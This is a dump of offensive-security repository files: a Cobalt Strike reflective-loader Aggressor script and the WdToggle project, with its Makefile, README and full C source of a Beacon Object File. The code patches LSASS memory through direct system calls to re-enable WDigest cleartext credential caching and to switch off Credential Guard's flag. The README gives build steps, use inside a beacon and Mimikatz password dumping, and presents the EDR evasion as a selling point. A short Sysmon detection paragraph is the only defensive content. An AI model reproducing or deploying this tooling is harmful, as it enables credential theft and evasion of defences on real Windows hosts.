/github/CobaltStrikeReflectiveLoader/images/top.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/github/CobaltStrikeReflectiveLoader/images/top.png -------------------------------------------------------------------------------- /github/CobaltStrikeReflectiveLoader/rdll_loader.cna: -------------------------------------------------------------------------------- 1 | # User Defined Reflective Loader Kit Aggressor Script 2 | sub generate_my_dll { 3 | local('$handle $data $loader $temp_dll'); 4 | # --------------------------------------------------------------------- 5 | # Load a object file that contains a Reflective Loader. 6 | # The architecture ($3) is used in the path. 7 | # --------------------------------------------------------------------- 8 | $handle = openf(script_resource("/bin/ReflectiveLoader.x64.o")); 9 | $data = readb($handle, -1); 10 | closef($handle); 11 | warn("Loaded Length: " . strlen($data)); 12 | if (strlen($data) eq 0) { 13 | warn("Error loading reflective loader object file - Reverting to using default Cobalt Strike Reflective Loader."); 14 | return $null; 15 | } 16 | # --------------------------------------------------------------------- 17 | # extract loader ($loader) from the object file data ($data). 18 | # --------------------------------------------------------------------- 19 | $loader = extract_reflective_loader($data); 20 | warn("Extracted Length: " . strlen($loader)); 21 | if (strlen($loader) eq 0) { 22 | warn("Error loading reflective loader object file - Reverting to using default Cobalt Strike Reflective Loader."); 23 | return $null; 24 | } 25 | # --------------------------------------------------------------------- 26 | # Setup the reflective loader ($loader) in the beacon ($2). 
27 | # --------------------------------------------------------------------- 28 | $temp_dll = setup_reflective_loader($2, $loader); 29 | # --------------------------------------------------------------------- 30 | # Give back the updated beacon DLL. 31 | # --------------------------------------------------------------------- 32 | return $temp_dll; 33 | } 34 | # ------------------------------------ 35 | # $1 = DLL file name 36 | # $2 = DLL content 37 | # $3 = arch 38 | # ------------------------------------ 39 | set BEACON_RDLL_GENERATE { 40 | if ($3 eq "x86") { 41 | warn("x86 selected - Reverting to using default Cobalt Strike Reflective Loader."); 42 | return $null; 43 | } 44 | warn("========== Running 'BEACON_RDLL_GENERATE' for DLL " . $1 . " with architecture " . $3 . " =========="); 45 | return generate_my_dll($1, $2, $3); 46 | } 47 | -------------------------------------------------------------------------------- /github/WdToggle/Makefile: -------------------------------------------------------------------------------- 1 | BOF := WdToggle 2 | CC_x64 := x86_64-w64-mingw32-gcc 3 | 4 | all: 5 | $(CC_x64) -o $(BOF).o -c WdToggle.c -masm=intel 6 | 7 | clean: 8 | rm $(BOF).o 9 | -------------------------------------------------------------------------------- /github/WdToggle/README.md: -------------------------------------------------------------------------------- 1 | # WdToggle # 2 | 3 | A Proof of Concept Cobalt Strike Beacon Object File which uses [direct system calls](https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/) to enable **WDigest** credential caching and circumvent **Credential Guard** (if enabled). 
4 | 5 | Additional guidance can be found in this blog post: https://outflank.nl/blog/?p=1592 6 | 7 | ### Background ### 8 | 9 | This PoC code is based on the following excellent blog posts: 10 | 11 | [Exploring Mimikatz - Part 1 - WDigest](https://blog.xpnsec.com/exploring-mimikatz-part-1/) 12 | 13 | [Bypassing Credential Guard](https://teamhydra.blog/2020/08/25/bypassing-credential-guard/) 14 | 15 | Utilizing direct system calls via inline assembly in BOF code provides a more opsec safe way of interacting with the LSASS process. Using direct system calls avoids AV/EDR software intercepting user-mode API calls. 16 | 17 | Visual Studio (C++) does not support inline assembly for x64 processors. So in order to write a single Beacon Object File containing our compiled / assembled code we must use the [Mingw-w64](http://mingw-w64.org) (GCC for Windows) compiler. 18 | 19 | ### What is this repository for? ### 20 | 21 | * Demonstrate the usage of direct system calls using inline-assembly to provide a more opsec safe way of interacting with the LSASS process. 22 | * Enable **WDigest** credential caching by toggling the ``g_fParameter_UseLogonCredential`` global parameter to 1 within the LSASS process (wdigest.dll module). 23 | * Circumvent **Credential Guard** (if enabled) by toggling the ``g_IsCredGuardEnabled`` variable to 0 within the LSASS process (wdigest.dll module). 24 | * Execute this code within the Beacon process using a [Beacon object file](https://www.cobaltstrike.com/help-beacon-object-files). 25 | 26 | ### How do I set this up? ### 27 | 28 | We will not supply compiled binaries. You will have to do this yourself: 29 | * Clone this repository. 30 | * Make sure you have the Mingw-w64 compiler installed. On Mac OSX for example, we can use the ports collection to install Mingw-w64 (``sudo port install mingw-w64``). 31 | * Run the ``make`` command to compile the Beacon object file. 
32 | * Within a Cobaltstrike beacon context run the ``inline-execute`` command and provide the path to the object ``WdToggle.o`` file. 33 | * Run the Cobaltstrike ``logonpasswords`` command (Mimikatz) and notice that clear text passwords are enabled again for new user logins or users who **unlock** their desktop session. 34 | 35 | ![WdToggle](WdToggle.png) 36 | 37 | ### Limitations ### 38 | 39 | * This memory patch is not reboot persistent, so after a reboot you must rerun the code. 40 | * The memory offsets to the ``wdigest!g_fParameter_UseLogonCredential`` and ``wdigest!g_IsCredGuardEnabled`` global variables could change between Windows versions and revisions. We provided some offsets for different builds, but these can change in future releases. You can add your own version offsets which can be found using the Windows debugger tools. 41 | 42 | ``` 43 | C:\Program Files (x86)\Windows Kits\10\Debuggers\x64>cdb.exe -z C:\Windows\System32\wdigest.dll 44 | 45 | 0:000>x wdigest!g_fParameter_UseLogonCredential 46 | 00000001`800361b4 wdigest!g_fParameter_UseLogonCredential = 47 | 0:000> x wdigest!g_IsCredGuardEnabled 48 | 00000001`80035c08 wdigest!g_IsCredGuardEnabled = 49 | 0:000> 50 | ``` 51 | 52 | ### Detection ### 53 | 54 | To detect credential theft through LSASS memory access, we could use a tool like [Sysmon](https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon). 55 | Sysmon can be configured to log processes opening a handle to the lsass.exe process. With this configuration applied, we can gather telemetry for suspicious processes accessing the LSASS process and help detect possible credential dumping activity. Of course, there are more options to detect credential theft, for example using an advanced detection platform like Windows Defender ATP. But if you don’t have the budget and luxury of using these platforms, then Sysmon is a free tool that can help fill the gap. 
56 | 57 | ### Credits ### 58 | 59 | * The assembly code used within this tool is based on the assembly output from the 60 | [SysWhispers](https://github.com/jthuraisamy/SysWhispers) tool from [@Jackson_T](https://twitter.com/Jackson_T). 61 | * Adam Chester [@\_xpn\_](https://twitter.com/_xpn_) 62 | * N4kedTurtle from [Team Hydra](https://teamhydra.blog) 63 | -------------------------------------------------------------------------------- /github/WdToggle/WdToggle.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | #include "WdToggle.h" 5 | #include "Syscalls.h" 6 | #include "beacon.h" 7 | 8 | 9 | // Open a handle to the LSASS process 10 | HANDLE GrabLsassHandle(DWORD dwPid) { 11 | NTSTATUS status; 12 | HANDLE hProcess = NULL; 13 | OBJECT_ATTRIBUTES ObjectAttributes; 14 | 15 | InitializeObjectAttributes(&ObjectAttributes, NULL, 0, NULL, NULL); 16 | CLIENT_ID uPid = { 0 }; 17 | 18 | uPid.UniqueProcess = (HANDLE)(DWORD_PTR)dwPid; 19 | uPid.UniqueThread = (HANDLE)0; 20 | 21 | status = ZwOpenProcess(&hProcess, PROCESS_QUERY_INFORMATION | PROCESS_VM_READ | PROCESS_VM_WRITE, &ObjectAttributes, &uPid); 22 | if (hProcess == NULL) { 23 | return NULL; 24 | } 25 | 26 | return hProcess; 27 | } 28 | 29 | // Read memory from LSASS process 30 | SIZE_T ReadFromLsass(HANDLE hLsass, LPVOID pAddr, LPVOID pMemOut, SIZE_T memOutLen) { 31 | NTSTATUS status = 0; 32 | SIZE_T bytesRead = 0; 33 | 34 | MSVCRT$memset(pMemOut, 0, memOutLen); 35 | 36 | status = ZwReadVirtualMemory(hLsass, pAddr, pMemOut, memOutLen, &bytesRead); 37 | if (status != STATUS_SUCCESS) { 38 | return 0; 39 | } 40 | 41 | return bytesRead; 42 | } 43 | 44 | // Write memory to LSASS process 45 | SIZE_T WriteToLsass(HANDLE hLsass, LPVOID pAddr, LPVOID memIn, SIZE_T memInLen) { 46 | NTSTATUS status = 0; 47 | SIZE_T bytesWritten = 0; 48 | 49 | status = ZwWriteVirtualMemory(hLsass, pAddr, memIn, memInLen, &bytesWritten); 50 | if (status != STATUS_SUCCESS) { 51 | 
return 0; 52 | } 53 | 54 | return bytesWritten; 55 | } 56 | 57 | BOOL ToggleWDigest(HANDLE hLsass, LPSTR scWdigestMem, DWORD64 logonCredential_offSet, BOOL bCredGuardEnabled, DWORD64 credGuardEnabled_offset) { 58 | ULONG ulNewLogonValue = 1, ulNewCredGuardValue = 0; 59 | ULONG ulCurLogonValue, ulCurCredGuardValue; 60 | SIZE_T sResult = 0; 61 | 62 | LPVOID pAddrOfUseLogonCredentialGlobalVariable = (PUCHAR)scWdigestMem + logonCredential_offSet; 63 | LPVOID pAddrOfIsCredGuardEnabledGlobalVariable = (PUCHAR)scWdigestMem + credGuardEnabled_offset; 64 | 65 | BeaconPrintf(CALLBACK_OUTPUT, "[*] g_fParameter_UseLogonCredential at 0x%p\n", pAddrOfUseLogonCredentialGlobalVariable); 66 | if (bCredGuardEnabled) { 67 | BeaconPrintf(CALLBACK_OUTPUT, "[*] g_IsCredGuardEnabled at 0x%p\n", pAddrOfIsCredGuardEnabledGlobalVariable); 68 | } 69 | 70 | // Read current value of wdigest!g_fParameter_useLogonCredential 71 | sResult = ReadFromLsass(hLsass, pAddrOfUseLogonCredentialGlobalVariable, &ulCurLogonValue, sizeof(ULONG)); 72 | if (sResult == 0) { 73 | return FALSE; 74 | } 75 | 76 | if (ulCurLogonValue == 1) { 77 | BeaconPrintf(CALLBACK_OUTPUT, "[*] UseLogonCredential already enabled\n\n"); 78 | return TRUE; 79 | } 80 | else if (ulCurLogonValue != 0) { 81 | BeaconPrintf(CALLBACK_ERROR, "[!] 
Error: Unexpected g_fParameter_UseLogonCredential value (possible offset mismatch?)\n\n"); 82 | return FALSE; 83 | } 84 | else { 85 | BeaconPrintf(CALLBACK_OUTPUT, "[*] Current value of g_fParameter_UseLogonCredential is: %d\n", ulCurLogonValue); 86 | BeaconPrintf(CALLBACK_OUTPUT, "[*] Toggling g_fParameter_UseLogonCredential to 1 in lsass.exe\n"); 87 | } 88 | 89 | sResult = WriteToLsass(hLsass, pAddrOfUseLogonCredentialGlobalVariable, &ulNewLogonValue, sizeof(ULONG)); 90 | if (sResult == 0) { 91 | return FALSE; 92 | } 93 | 94 | // Read new value of wdigest!g_fParameter_useLogonCredential 95 | ReadFromLsass(hLsass, pAddrOfUseLogonCredentialGlobalVariable, &ulCurLogonValue, sizeof(ULONG)); 96 | BeaconPrintf(CALLBACK_OUTPUT, "[*] New value of g_fParameter_UseLogonCredential is: %d\n", ulCurLogonValue); 97 | 98 | if (bCredGuardEnabled && credGuardEnabled_offset != 0) { 99 | // Read current value of wdigest!g_IsCredGuardEnabled 100 | sResult = ReadFromLsass(hLsass, pAddrOfIsCredGuardEnabledGlobalVariable, &ulCurCredGuardValue, sizeof(ULONG)); 101 | if (sResult == 0) { 102 | return FALSE; 103 | } 104 | 105 | if (ulCurCredGuardValue == 0) { 106 | BeaconPrintf(CALLBACK_OUTPUT, "[*] IsCredGuardEnabled already disabled\n\n"); 107 | return TRUE; 108 | } 109 | else if (ulCurCredGuardValue != 1) { 110 | BeaconPrintf(CALLBACK_ERROR, "[!] 
Error: Unexpected g_IsCredGuardEnabled value (possible offset mismatch?)\n\n"); 111 | return FALSE; 112 | } 113 | else { 114 | BeaconPrintf(CALLBACK_OUTPUT, "[*] Current value of g_IsCredGuardEnabled is: %d\n", ulCurCredGuardValue); 115 | BeaconPrintf(CALLBACK_OUTPUT, "[*] Toggling g_IsCredGuardEnabled to 0 in lsass.exe\n"); 116 | } 117 | 118 | sResult = WriteToLsass(hLsass, pAddrOfIsCredGuardEnabledGlobalVariable, &ulNewCredGuardValue, sizeof(ULONG)); 119 | if (sResult == 0) { 120 | return FALSE; 121 | } 122 | 123 | // Read new value of wdigest!g_IsCredGuardEnabled 124 | ReadFromLsass(hLsass, pAddrOfIsCredGuardEnabledGlobalVariable, &ulCurCredGuardValue, sizeof(ULONG)); 125 | BeaconPrintf(CALLBACK_OUTPUT, "[*] New value of g_IsCredGuardEnabled is: %d\n", ulCurCredGuardValue); 126 | } 127 | 128 | BeaconPrintf(CALLBACK_OUTPUT, "[*] Done... WDigest credential caching should now be on\n\n"); 129 | 130 | return TRUE; 131 | } 132 | 133 | HANDLE OpenRegKeyHandle(INT DesiredAccess, PUNICODE_STRING RegistryKeyName) { 134 | NTSTATUS Status = STATUS_UNSUCCESSFUL; 135 | HANDLE regKeyHandle = NULL; 136 | 137 | OBJECT_ATTRIBUTES ObjectAttributes; 138 | InitializeObjectAttributes(&ObjectAttributes, RegistryKeyName, OBJ_CASE_INSENSITIVE, NULL, NULL); 139 | 140 | Status = ZwOpenKey(®KeyHandle, DesiredAccess, &ObjectAttributes); 141 | if (Status != STATUS_SUCCESS) { 142 | return NULL; 143 | } 144 | 145 | return regKeyHandle; 146 | } 147 | 148 | // Read UBR (Update Build Revision) from registry 149 | DWORD ReadUBRFromRegistry() { 150 | NTSTATUS Status = STATUS_UNSUCCESSFUL; 151 | HANDLE regKeyHandle = NULL; 152 | UNICODE_STRING RegistryKeyName; 153 | UNICODE_STRING KeyValueName; 154 | PKEY_VALUE_FULL_INFORMATION KeyValueInformation = NULL; 155 | ULONG KeyResultLength = 0; 156 | DWORD dwValueData = 0; 157 | 158 | _RtlInitUnicodeString RtlInitUnicodeString = (_RtlInitUnicodeString) 159 | GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlInitUnicodeString"); 160 | if 
(RtlInitUnicodeString == NULL) {
161 | return 0;
162 | }
163 | 
164 | RtlInitUnicodeString(&RegistryKeyName, L"\\Registry\\Machine\\Software\\Microsoft\\Windows NT\\CurrentVersion");
165 | RtlInitUnicodeString(&KeyValueName, L"UBR");
166 | 
167 | regKeyHandle = OpenRegKeyHandle(KEY_QUERY_VALUE, &RegistryKeyName);
168 | if (regKeyHandle == NULL) {
169 | return 0;
170 | }
171 | 
// Size probe: the zero-length query is expected to fail with STATUS_BUFFER_TOO_SMALL
// and leave the required size in KeyResultLength; any other status is treated as failure.
172 | Status = ZwQueryValueKey(regKeyHandle, &KeyValueName, KeyValueFullInformation, NULL, 0, &KeyResultLength);
173 | if (Status != STATUS_BUFFER_TOO_SMALL) {
174 | goto CleanUp;
175 | }
176 | 
// NOTE(review): the HeapAlloc result is not checked for NULL before it is passed to
// ZwQueryValueKey; an allocation failure would hand the call a NULL buffer with a
// non-zero length.
177 | KeyValueInformation = (PKEY_VALUE_FULL_INFORMATION)KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, KeyResultLength);
178 | Status = ZwQueryValueKey(regKeyHandle, &KeyValueName, KeyValueFullInformation, KeyValueInformation, KeyResultLength, &KeyResultLength);
179 | if (Status != STATUS_SUCCESS) {
180 | goto CleanUp;
181 | }
182 | 
// The value bytes start DataOffset bytes into the KEY_VALUE_FULL_INFORMATION buffer.
// NOTE(review): KeyValueInformation->Type is not checked against REG_DWORD before the
// DWORD read, so a non-DWORD UBR value would be misread rather than rejected.
183 | dwValueData = *((DWORD*)((PUCHAR)&KeyValueInformation[0] + KeyValueInformation[0].DataOffset));
184 | 
185 | CleanUp:
186 | 
187 | if (regKeyHandle != NULL) {
188 | ZwClose(regKeyHandle);
189 | }
190 | 
191 | if (KeyValueInformation != NULL) {
192 | KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, KeyValueInformation);
193 | }
194 | 
195 | return dwValueData;
196 | }
197 | 
198 | // Searches for lsass.exe PID
// Walks the SystemProcessInformation snapshot returned by ZwQuerySystemInformation and
// returns the ProcessId of the first entry whose ProcessName equals lpwLsass (compared
// case-insensitively: RtlEqualUnicodeString is called with CaseInSensitive = TRUE).
// Returns 0 when the Rtl helpers cannot be resolved from ntdll, the snapshot cannot be
// obtained, or no process with that name is present.
199 | DWORD GetLsassPid(LPCWSTR lpwLsass) {
200 | NTSTATUS status;
201 | LPVOID pBuffer = NULL;
202 | DWORD dwPid = 0;
203 | ULONG uReturnLength = 0;
204 | SIZE_T uSize = 0;
205 | PSYSTEM_PROCESSES pProcInfo = NULL;
206 | 
// RtlInitUnicodeString / RtlEqualUnicodeString are resolved at run time from ntdll
// instead of being linked; either lookup failing aborts with 0.
207 | _RtlInitUnicodeString RtlInitUnicodeString = (_RtlInitUnicodeString)
208 | GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlInitUnicodeString");
209 | if (RtlInitUnicodeString == NULL) {
210 | return 0;
211 | }
212 | 
213 | _RtlEqualUnicodeString RtlEqualUnicodeString = (_RtlEqualUnicodeString)
214 | GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlEqualUnicodeString");
215 | if (RtlEqualUnicodeString == NULL) {
216 | return 0;
217 | }
218 | 
// Size probe: a zero-length query is expected to fail with STATUS_INFO_LENGTH_MISMATCH
// and report the buffer size needed in uReturnLength.
219 | status = ZwQuerySystemInformation(SystemProcessInformation, 0, 0, &uReturnLength);
220 | if (!(status == STATUS_INFO_LENGTH_MISMATCH)) {
221 | return 0;
222 | }
223 | 
224 | uSize = uReturnLength;
225 | status = ZwAllocateVirtualMemory(NtCurrentProcess(), &pBuffer, 0, &uSize, MEM_COMMIT, PAGE_READWRITE);
226 | if (status != STATUS_SUCCESS) {
227 | return 0;
228 | }
229 | 
// NOTE(review): no retry. If the process list grows between the two queries the second
// call presumably fails with STATUS_INFO_LENGTH_MISMATCH again, and the function gives
// up with 0 instead of re-probing with the larger size.
230 | status = ZwQuerySystemInformation(SystemProcessInformation, pBuffer, uReturnLength, &uReturnLength);
231 | if (status != STATUS_SUCCESS) {
232 | status = ZwFreeVirtualMemory(NtCurrentProcess(), &pBuffer, &uSize, MEM_RELEASE);
233 | return 0;
234 | }
235 | 
236 | UNICODE_STRING uLsass;
237 | RtlInitUnicodeString(&uLsass, lpwLsass);
238 | 
239 | pProcInfo = (PSYSTEM_PROCESSES)pBuffer;
240 | do {
// NOTE(review): the cursor is advanced before the first comparison, so the record at
// the very start of the snapshot is never examined. Presumably harmless for lsass.exe
// (the first record is normally the idle process) but relevant if this helper is
// reused to look up other names.
241 | pProcInfo = (PSYSTEM_PROCESSES)(((LPBYTE)pProcInfo) + pProcInfo->NextEntryDelta);
242 | 
243 | if (RtlEqualUnicodeString(&pProcInfo->ProcessName, &uLsass, TRUE)) {
244 | dwPid = (DWORD)(DWORD_PTR)pProcInfo->ProcessId;
245 | goto CleanUp;
246 | }
247 | 
// NextEntryDelta == 0 marks the last record. This break is the loop's only normal exit:
// pProcInfo is never NULL here, so the while condition below is always true.
248 | if (pProcInfo->NextEntryDelta == 0) {
249 | break;
250 | }
251 | 
252 | } while (pProcInfo);
253 | 
254 | CleanUp:
255 | 
256 | if (pBuffer != NULL) {
257 | ZwFreeVirtualMemory(NtCurrentProcess(), &pBuffer, &uSize, MEM_RELEASE);
258 | }
259 | 
260 | return dwPid;
261 | }
262 | 
// Enables SeDebugPrivilege on the current process token (ZwOpenProcessToken followed by
// ZwAdjustPrivilegesToken). Returns FALSE on failure, closing the token handle first once
// one has been opened. This is the privilege the later ZwOpenProcess on lsass.exe in
// GrabLsassHandle relies on; from a monitoring standpoint a non-debugger process enabling
// it is a useful precursor signal for the LSASS access the README's Detection section
// describes.
263 | BOOL SetDebugPrivilege() {
264 | HANDLE hToken = NULL;
265 | TOKEN_PRIVILEGES TokenPrivileges = { 0 };
266 | 
267 | NTSTATUS status = ZwOpenProcessToken(NtCurrentProcess(), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &hToken);
268 | if (status != STATUS_SUCCESS) {
269 | return FALSE;
270 | }
271 | 
272 | TokenPrivileges.PrivilegeCount = 1;
273 | TokenPrivileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
274 | 
275 | LPCWSTR lpwPriv = L"SeDebugPrivilege";
276 | if (!ADVAPI32$LookupPrivilegeValueW(NULL, lpwPriv, &TokenPrivileges.Privileges[0].Luid)) {
277 | ZwClose(hToken);
278 | return FALSE;
279 | }
280 | 
281 | status = ZwAdjustPrivilegesToken(hToken, 
FALSE, &TokenPrivileges, sizeof(TOKEN_PRIVILEGES), NULL, NULL); 282 | if (status != STATUS_SUCCESS) { 283 | ZwClose(hToken); 284 | return FALSE; 285 | } 286 | 287 | ZwClose(hToken); 288 | 289 | return TRUE; 290 | } 291 | 292 | 293 | VOID go(IN PCHAR Args, IN ULONG Length) { 294 | HANDLE hLsass = NULL; 295 | HMODULE* hLsassDll = NULL; 296 | DWORD bytesReturned; 297 | DWORD cbNeeded; 298 | CHAR modName[MAX_PATH]; 299 | LPSTR wdigest = NULL; 300 | BOOL bCredGuardEnabled = FALSE; 301 | DWORD64 logonCredential_offSet = 0; 302 | DWORD64 credGuardEnabled_offset = 0; 303 | DWORD dwResult = 0; 304 | 305 | WCHAR chOSMajorMinor[8]; 306 | DWORD dwUBR = 0; 307 | PNT_TIB pTIB = NULL; 308 | PTEB pTEB = NULL; 309 | PPEB pPEB = NULL; 310 | DWORD dwLsassPID = 0; 311 | DWORD dwLsaIsoPID = 0; 312 | 313 | 314 | pTIB = (PNT_TIB)GetTEBAsm64(); 315 | 316 | pTEB = (PTEB)pTIB->Self; 317 | pPEB = (PPEB)pTEB->ProcessEnvironmentBlock; 318 | if (pPEB == NULL) { 319 | return; 320 | } 321 | 322 | MSVCRT$swprintf_s(chOSMajorMinor, sizeof(chOSMajorMinor), L"%u.%u", pPEB->OSMajorVersion, pPEB->OSMinorVersion); 323 | 324 | // Read UBR value from registry (we don't want to screw up lsass) 325 | dwUBR = ReadUBRFromRegistry(); 326 | if (dwUBR != 0) { 327 | BeaconPrintf(CALLBACK_OUTPUT, "Windows version: %ls, OS build number: %u.%u\n", chOSMajorMinor, pPEB->OSBuildNumber, dwUBR); 328 | } 329 | else { 330 | BeaconPrintf(CALLBACK_OUTPUT, "Windows version: %ls, OS build number: %u\n", chOSMajorMinor, pPEB->OSBuildNumber); 331 | } 332 | 333 | // Offsets for wdigest!g_fParameter_UseLogonCredential (here you can add offsets for additional OS builds/revisions) 334 | // C:\Program Files (x86)\Windows Kits\10\Debuggers\x64>cdb.exe -z C:\Windows\System32\wdigest.dll 335 | // 0:000>x wdigest!g_fParameter_UseLogonCredential 336 | // 0:000>x wdigest!g_IsCredGuardEnabled 337 | if (MSVCRT$_wcsicmp(chOSMajorMinor, L"6.3") == 0 && pPEB->OSBuildNumber == 9600 && dwUBR >= 19747) { // 8.1 / W2k12 R2 338 | 
logonCredential_offSet = 0x33040; 339 | } 340 | else if (MSVCRT$_wcsicmp(chOSMajorMinor, L"10.0") == 0 && pPEB->OSBuildNumber == 14393 && dwUBR >= 3686) { // v1607 341 | logonCredential_offSet = 0x35dc0; 342 | credGuardEnabled_offset = 0x35ba8; 343 | } 344 | else if (MSVCRT$_wcsicmp(chOSMajorMinor, L"10.0") == 0 && pPEB->OSBuildNumber == 17763 && dwUBR >= 1457) { // v1809 345 | logonCredential_offSet = 0x36114; 346 | credGuardEnabled_offset = 0x35b88; 347 | } 348 | else if (MSVCRT$_wcsicmp(chOSMajorMinor, L"10.0") == 0 && pPEB->OSBuildNumber == 18362 && dwUBR >= 1110) { // v1903 349 | logonCredential_offSet = 0x36124; 350 | credGuardEnabled_offset = 0x35b88; 351 | } 352 | else if (MSVCRT$_wcsicmp(chOSMajorMinor, L"10.0") == 0 && pPEB->OSBuildNumber == 18363 && dwUBR >= 1110) { // v1909 353 | logonCredential_offSet = 0x36124; 354 | credGuardEnabled_offset = 0x35b88; 355 | } 356 | else if (MSVCRT$_wcsicmp(chOSMajorMinor, L"10.0") == 0 && pPEB->OSBuildNumber == 19041 && dwUBR >= 572) { // v2004 357 | logonCredential_offSet = 0x361b4; 358 | credGuardEnabled_offset = 0x35c08; 359 | } 360 | else if (MSVCRT$_wcsicmp(chOSMajorMinor, L"10.0") == 0 && pPEB->OSBuildNumber == 19042 && dwUBR >= 630) { // v20H2 361 | logonCredential_offSet = 0x361b4; 362 | credGuardEnabled_offset = 0x35c08; 363 | } 364 | else { 365 | BeaconPrintf(CALLBACK_ERROR, "[!] OS Version/build/revision not supported\n"); 366 | return; 367 | } 368 | 369 | BeaconPrintf(CALLBACK_OUTPUT, "[*] Enable SeDebugPrivilege\n"); 370 | if (!SetDebugPrivilege()) { 371 | BeaconPrintf(CALLBACK_ERROR, "[!] Error: Failed to enable SeDebugPrivilege\n"); 372 | return; 373 | } 374 | 375 | dwLsassPID = GetLsassPid(L"lsass.exe"); 376 | if (dwLsassPID != 0) { 377 | BeaconPrintf(CALLBACK_OUTPUT, "[*] Lsass PID is: %u\n", dwLsassPID); 378 | } 379 | else{ 380 | BeaconPrintf(CALLBACK_ERROR, "[!] 
Error: Failed to obtain to lsass PID\n"); 381 | return; 382 | } 383 | 384 | if (MSVCRT$_wcsicmp(chOSMajorMinor, L"10.0") == 0 && pPEB->OSBuildNumber >= 14393) { 385 | dwLsaIsoPID = GetLsassPid(L"lsaiso.exe"); 386 | if (dwLsaIsoPID != 0) { 387 | bCredGuardEnabled = TRUE; 388 | BeaconPrintf(CALLBACK_OUTPUT, "[*] Credential Guard enabled, LsaIso PID is: %u\n", dwLsaIsoPID); 389 | } 390 | } 391 | 392 | hLsass = GrabLsassHandle(dwLsassPID); 393 | if (hLsass == NULL || hLsass == INVALID_HANDLE_VALUE) { 394 | BeaconPrintf(CALLBACK_ERROR, "[!] Error: Could not open handle to lsass process\n"); 395 | goto CleanUp; 396 | } 397 | 398 | if(!PSAPI$EnumProcessModules(hLsass, 0, 0, &cbNeeded)){ 399 | BeaconPrintf(CALLBACK_ERROR, "[!] Error: Failed to enumerate modules\n"); 400 | goto CleanUp; 401 | } 402 | 403 | hLsassDll = KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, cbNeeded); 404 | if (hLsassDll == NULL) { 405 | BeaconPrintf(CALLBACK_ERROR, "[!] Error: Failed to allocate modules memory\n"); 406 | goto CleanUp; 407 | } 408 | 409 | // Enumerate all loaded modules within lsass process 410 | if (PSAPI$EnumProcessModules(hLsass, hLsassDll, cbNeeded, &bytesReturned)) { 411 | for (int i = 0; i < bytesReturned / sizeof(HMODULE); i++) { 412 | PSAPI$GetModuleFileNameExA(hLsass, hLsassDll[i], modName, sizeof(modName)); 413 | if (MSVCRT$strstr(modName, "wdigest.DLL") != (LPSTR)NULL) { 414 | wdigest = (LPSTR)hLsassDll[i]; 415 | break; 416 | } 417 | } 418 | } 419 | else { 420 | BeaconPrintf(CALLBACK_ERROR, "[!] Error: No modules in LSASS :(\n"); 421 | BeaconPrintf(CALLBACK_ERROR, "[!] Error: %d\n", KERNEL32$GetLastError()); 422 | } 423 | 424 | // Make sure we have all the DLLs that we require 425 | if (wdigest == NULL) { 426 | BeaconPrintf(CALLBACK_ERROR, "[!] 
Error: Could not find all DLL's in LSASS :(\n"); 427 | goto CleanUp; 428 | } 429 | 430 | BeaconPrintf(CALLBACK_OUTPUT, "[*] wdigest.dll found at 0x%p\n", wdigest); 431 | 432 | if (!ToggleWDigest(hLsass, wdigest, logonCredential_offSet, bCredGuardEnabled, credGuardEnabled_offset)) { 433 | BeaconPrintf(CALLBACK_ERROR, "[!] Error: Could not patch g_fParameter_UseLogonCredential\n"); 434 | goto CleanUp; 435 | } 436 | 437 | CleanUp: 438 | 439 | if (hLsass != NULL) { 440 | ZwClose(hLsass); 441 | } 442 | 443 | if (hLsassDll != NULL) { 444 | KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, hLsassDll); 445 | } 446 | 447 | return; 448 | } 449 | -------------------------------------------------------------------------------- /github/WdToggle/WdToggle.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | 5 | #define STATUS_SUCCESS 0 6 | #define STATUS_UNSUCCESSFUL 0xC0000001 7 | #define STATUS_BUFFER_TOO_SMALL 0xC0000023 8 | #define STATUS_INFO_LENGTH_MISMATCH 0xC0000004 9 | 10 | #define OBJ_CASE_INSENSITIVE 0x00000040L 11 | 12 | #define NtCurrentProcess() ( (HANDLE)(LONG_PTR) -1 ) 13 | 14 | //KERNEL32 15 | WINBASEAPI DWORD WINAPI KERNEL32$GetLastError (VOID); 16 | WINBASEAPI void * WINAPI KERNEL32$HeapAlloc (HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes); 17 | WINBASEAPI HANDLE WINAPI KERNEL32$GetProcessHeap(); 18 | WINBASEAPI BOOL WINAPI KERNEL32$HeapFree (HANDLE, DWORD, PVOID); 19 | 20 | //MSVCRT 21 | WINBASEAPI int __cdecl MSVCRT$_wcsicmp(const wchar_t *_Str1, const wchar_t *_Str2); 22 | WINBASEAPI int __cdecl MSVCRT$swprintf_s(wchar_t *buffer, size_t sizeOfBuffer, const wchar_t *format, ...); 23 | DECLSPEC_IMPORT PCHAR __cdecl MSVCRT$strstr(const char *haystack, const char *needle); 24 | WINBASEAPI void __cdecl MSVCRT$memset(void *dest, int c, size_t count); 25 | 26 | //ADVAPI32 27 | WINADVAPI WINBOOL WINAPI ADVAPI32$LookupPrivilegeValueW(LPCWSTR lpSystemName, LPCWSTR lpName, PLUID lpLuid); 28 | 29 | //PSAPI 
